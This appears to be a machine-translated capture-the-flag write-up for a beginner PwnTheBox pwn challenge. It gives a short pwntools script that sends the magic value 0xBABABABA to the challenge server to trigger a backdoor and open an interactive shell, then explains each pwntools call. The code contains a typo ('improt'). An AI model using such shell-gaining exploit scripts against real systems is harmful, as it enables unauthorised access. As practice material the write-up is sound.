PwnTheBox，Pwn：tutorial1

analysis , When buf The stored value is 0xBABABABA ( Hexadecimal ) when , Would call backdoor function

stay backdoor Command execution in , You can use system obtain shell

Sum up ,payload yes 0xBABABABA

exp：

from pwn improt *
context(log_level='debug')
p = remote('redirect.do-not-trust.hacking.run',10146)
payload = 0xBABABABA
p.sendline(p64(payload))
p.recv()
p.interactive()

-context(os='linux', arch='amd64', log_level='debug')

1. os Set the system to linux System , At the completion of ctf When it comes to the topic , majority pwn The title system is linux
2. arch Set the schema to amd64, You can simply think of the setting as 64 Bit pattern , Corresponding 32 Bit mode is ’i386’
3. log_level Set the level of log output to debug, This sentence is usually set during debugging , such pwntools It will be complete io The process is printed out , Make debugging more convenient , It can be avoided when CTF There are some and IO Related errors .

-remote The module accesses the remote server

-sendline(data) : Send a line of data , It is equivalent to adding... At the end of the data \n.

-recv(numb= Byte size , timeout=default) : Receive the specified number of bytes .

-interactive() : Acquire shell Then use , Interact directly , It's like going back to shell The pattern of .

Get through , Get directory

obtain flag